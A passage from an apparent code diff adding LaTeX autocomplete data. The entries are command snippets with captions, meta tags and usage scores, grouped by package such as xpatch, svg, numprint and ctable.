}, + ], + nth: [ + { + caption: '\\nth{}', + snippet: '\\nth{$1}', + meta: 'nth-cmd', + score: 0.0006155314043974968, + }, + { + caption: '\\thesection', + snippet: '\\thesection', + meta: 'nth-cmd', + score: 0.011068945893347528, + }, + { + caption: '\\thesection{}', + snippet: '\\thesection{$1}', + meta: 'nth-cmd', + score: 0.011068945893347528, + }, + ], + showkeys: [ + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'showkeys-cmd', + score: 1.897791904799601, + }, + ], + fncychap: [ + { + caption: '\\appendix', + snippet: '\\appendix', + meta: 'fncychap-cmd', + score: 0.047007158741781095, + }, + { + caption: '\\ChTitleVar{}', + snippet: '\\ChTitleVar{$1}', + meta: 'fncychap-cmd', + score: 0.00047530324346933345, + }, + { + caption: '\\thechapter', + snippet: '\\thechapter', + meta: 'fncychap-cmd', + score: 0.011821300392639589, + }, + ], + ae: [ + { + caption: '\\sfdefault', + snippet: '\\sfdefault', + meta: 'ae-cmd', + score: 0.008427383388519996, + }, + { + caption: '\\sfdefault{}', + snippet: '\\sfdefault{$1}', + meta: 'ae-cmd', + score: 0.008427383388519996, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'ae-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'ae-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'ae-cmd', + score: 0.021170869458413965, + }, + ], + asymptote: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'asymptote-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'asymptote-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'asymptote-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'asymptote-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'asymptote-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'asymptote-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'asymptote-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'asymptote-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'asymptote-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'asymptote-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'asymptote-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'asymptote-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'asymptote-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'asymptote-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'asymptote-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'asymptote-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'asymptote-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'asymptote-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'asymptote-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'asymptote-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'asymptote-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'asymptote-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'asymptote-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'asymptote-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'asymptote-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'asymptote-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'asymptote-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'asymptote-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'asymptote-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'asymptote-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'asymptote-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'asymptote-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'asymptote-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'asymptote-cmd', + score: 0.008565354665444157, + }, + ], + truncate: [ + { + caption: '\\selectfont', + snippet: '\\selectfont', + meta: 'truncate-cmd', + score: 0.04598628699063736, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'truncate-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'truncate-cmd', + score: 0.021170869458413965, + }, + ], + xpatch: [ + { + caption: '\\xpatchcmd{}{}{}{}{}', + snippet: '\\xpatchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'xpatch-cmd', + score: 0.0019344877752147675, + }, + { + caption: '\\xpatchcmd', + snippet: '\\xpatchcmd', + meta: 'xpatch-cmd', + score: 0.0019344877752147675, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'xpatch-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'xpatch-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'xpatch-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'xpatch-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'xpatch-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'xpatch-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'xpatch-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'xpatch-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'xpatch-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'xpatch-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'xpatch-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'xpatch-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'xpatch-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'xpatch-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'xpatch-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'xpatch-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'xpatch-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'xpatch-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'xpatch-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'xpatch-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'xpatch-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'xpatch-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'xpatch-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'xpatch-cmd', + score: 0.2864294797053033, + }, + ], + totpages: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'totpages-cmd', + score: 0.00037306820619479756, + }, + ], + fourier: [ + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'fourier-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'fourier-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'fourier-cmd', + score: 0.021170869458413965, + }, + ], + scrbase: [ + { + caption: '\\newpage', + snippet: '\\newpage', + meta: 'scrbase-cmd', + score: 0.3277033727934986, + }, + { + caption: '\\clearpage', + snippet: '\\clearpage', + meta: 'scrbase-cmd', + score: 0.1789117552185788, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'scrbase-cmd', + score: 0.00037306820619479756, + }, + ], + svg: [ + { + caption: '\\newpage', + snippet: '\\newpage', + meta: 'svg-cmd', + score: 0.3277033727934986, + }, + { + caption: '\\clearpage', + snippet: '\\clearpage', + meta: 'svg-cmd', + score: 0.1789117552185788, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'svg-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'svg-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'svg-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'svg-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'svg-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'svg-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'svg-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'svg-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'svg-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'svg-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'svg-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'svg-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'svg-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'svg-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'svg-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'svg-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'svg-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'svg-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'svg-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'svg-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'svg-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'svg-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'svg-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'svg-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'svg-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'svg-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'svg-cmd', + score: 0.008565354665444157, + }, + ], + etex: [ + { + caption: '\\reserveinserts{}', + snippet: '\\reserveinserts{$1}', + meta: 'etex-cmd', + score: 0.0018653410309739879, + }, + { + caption: '\\newtoks', + snippet: '\\newtoks', + meta: 'etex-cmd', + score: 0.00031058155311734754, + }, + ], + linguex: [ + { + caption: '\\Last[]', + snippet: '\\Last[$1]', + meta: 'linguex-cmd', + score: 0.0008163755131430334, + }, + { + caption: '\\Last', + snippet: '\\Last', + meta: 'linguex-cmd', + score: 0.0008163755131430334, + }, + { + caption: '\\Next', + snippet: '\\Next', + meta: 'linguex-cmd', + score: 0.0018776636802289772, + }, + { + caption: '\\Next[]', + snippet: '\\Next[$1]', + meta: 'linguex-cmd', + score: 0.0018776636802289772, + }, + { + caption: '\\LLast[]', + snippet: '\\LLast[$1]', + meta: 'linguex-cmd', + score: 0.00016327510262860667, + }, + { + caption: '\\LLast', + snippet: '\\LLast', + meta: 'linguex-cmd', + score: 0.00016327510262860667, + }, + { + caption: '\\NNext[]', + snippet: '\\NNext[$1]', + meta: 'linguex-cmd', + score: 0.0004490065322286684, + }, + { + caption: '\\NNext', + snippet: '\\NNext', + meta: 'linguex-cmd', + score: 0.0004490065322286684, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'linguex-cmd', + score: 1.897791904799601, + }, + { + caption: '\\xspace', + snippet: '\\xspace', + meta: 'linguex-cmd', + score: 0.07560370351316588, + }, + ], + adforn: [ + { + caption: '\\adforn{}', + snippet: '\\adforn{$1}', + meta: 'adforn-cmd', + score: 0.0003148505561835075, + }, + { + caption: '\\ding{}', + snippet: '\\ding{$1}', + meta: 'adforn-cmd', + score: 0.009992300665793867, + }, + ], + bigstrut: [ + { + caption: '\\bigstrut', + snippet: '\\bigstrut', + meta: 'bigstrut-cmd', + score: 0.005498219710082848, + }, + ], + standalone: [ + { + caption: '\\renewcommand{}{}', + snippet: '\\renewcommand{$1}{$2}', + meta: 'standalone-cmd', + score: 0.3267437011085663, + }, + { + caption: '\\renewcommand', + snippet: '\\renewcommand', + meta: 'standalone-cmd', + score: 0.3267437011085663, + }, + { + caption: '\\currfiledir', + snippet: '\\currfiledir', + meta: 'standalone-cmd', + score: 0.0002459788020229296, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'standalone-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'standalone-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'standalone-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'standalone-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'standalone-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'standalone-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'standalone-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'standalone-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'standalone-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'standalone-cmd', + score: 0.021170869458413965, + }, + ], + ifsym: [ + { + caption: '\\Letter', + snippet: '\\Letter', + meta: 'ifsym-cmd', + score: 0.0012281130571092198, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'ifsym-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'ifsym-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'ifsym-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'ifsym-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'ifsym-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'ifsym-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'ifsym-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'ifsym-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'ifsym-cmd', + score: 0.028955796305270766, + }, + ], + newtxtext: [ + { + caption: '\\textsc{}', + snippet: '\\textsc{$1}', + meta: 'newtxtext-cmd', + score: 0.6926466355384758, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'newtxtext-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'newtxtext-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'newtxtext-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'newtxtext-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'newtxtext-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'newtxtext-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'newtxtext-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'newtxtext-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'newtxtext-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'newtxtext-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'newtxtext-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'newtxtext-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'newtxtext-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'newtxtext-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'newtxtext-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'newtxtext-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'newtxtext-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'newtxtext-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'newtxtext-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'newtxtext-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'newtxtext-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'newtxtext-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'newtxtext-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'newtxtext-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'newtxtext-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'newtxtext-cmd', + score: 0.008565354665444157, + }, + ], + silence: [ + { + caption: '\\WarningsOff[]', + snippet: '\\WarningsOff[$1]', + meta: 'silence-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\WarningFilter{}{}', + snippet: '\\WarningFilter{$1}{$2}', + meta: 'silence-cmd', + score: 0.0010293824370507024, + }, + ], + numprint: [ + { + caption: '\\textcelsius', + snippet: '\\textcelsius', + meta: 'numprint-cmd', + score: 0.00012244782670334462, + }, + { + caption: '\\pm', + snippet: '\\pm', + meta: 'numprint-cmd', + score: 0.15663535405975132, + }, + { + caption: '\\npdecimalsign{}', + snippet: '\\npdecimalsign{$1}', + meta: 'numprint-cmd', + score: 8.401009062000455e-6, + }, + { + caption: '\\npthousandsep{}', + snippet: '\\npthousandsep{$1}', + meta: 'numprint-cmd', + score: 8.401009062000455e-6, + }, + { + caption: '\\np{}', + snippet: '\\np{$1}', + meta: 'numprint-cmd', + score: 0.0001782233963311367, + }, + { + caption: '\\np', + snippet: '\\np', + meta: 'numprint-cmd', + score: 0.0001782233963311367, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'numprint-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'numprint-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\endtabular', + snippet: '\\endtabular', + meta: 'numprint-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\multicolumn{}{}{}', + snippet: '\\multicolumn{$1}{$2}{$3}', + meta: 'numprint-cmd', + score: 0.5473606021405326, + }, + { + caption: '\\array{}', + snippet: '\\array{$1}', + meta: 'numprint-cmd', + score: 2.650484574842396e-5, + }, + { + caption: '\\arraybackslash', + snippet: '\\arraybackslash', + meta: 'numprint-cmd', + score: 0.014532521139459619, + }, + { + caption: '\\tabular{}', + snippet: '\\tabular{$1}', + meta: 'numprint-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'numprint-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\newcolumntype{}[]{}', + snippet: '\\newcolumntype{$1}[$2]{$3}', + meta: 'numprint-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\newcolumntype{}{}', + snippet: '\\newcolumntype{$1}{$2}', + meta: 'numprint-cmd', + score: 0.018615449342361392, + }, + ], + srcltx: [ + { + caption: '\\bibliography{}', + snippet: '\\bibliography{$1}', + meta: 'srcltx-cmd', + score: 0.2659628337907604, + }, + { + caption: '\\input{}', + snippet: '\\input{$1}', + meta: 'srcltx-cmd', + score: 0.4966021927742672, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'srcltx-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'srcltx-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'srcltx-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'srcltx-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'srcltx-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'srcltx-cmd', + score: 0.0018957469739775527, + }, + ], + ctable: [ + { + caption: '\\tmark[]', + snippet: '\\tmark[$1]', + meta: 'ctable-cmd', + score: 0.004423748442334348, + }, + { + caption: '\\ctable[]{}{}{}', + snippet: '\\ctable[$1]{$2}{$3}{$4}', + meta: 'ctable-cmd', + score: 0.0007377841391165772, + }, + { + caption: '\\let', + snippet: '\\let', + meta: 'ctable-cmd', + score: 0.03789745970461662, + }, + { + caption: '\\write', + snippet: '\\write', + meta: 'ctable-cmd', + score: 0.0008038857295393196, + }, + { + caption: '\\tabularxcolumn[]{}', + snippet: '\\tabularxcolumn[$1]{$2}', + meta: 'ctable-cmd', + score: 0.00048507499766588637, + }, + { + caption: '\\tabularxcolumn', + snippet: '\\tabularxcolumn', + meta: 'ctable-cmd', + score: 0.00048507499766588637, + }, + { + caption: '\\tabularx{}{}', + snippet: '\\tabularx{$1}{$2}', + meta: 'ctable-cmd', + score: 0.0005861357565780464, + }, + { + caption: '\\arraybackslash', + snippet: '\\arraybackslash', + meta: 'ctable-cmd', + score: 0.014532521139459619, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'ctable-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'ctable-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'ctable-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'ctable-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'ctable-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'ctable-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'ctable-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'ctable-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'ctable-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'ctable-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'ctable-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'ctable-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'ctable-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'ctable-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: 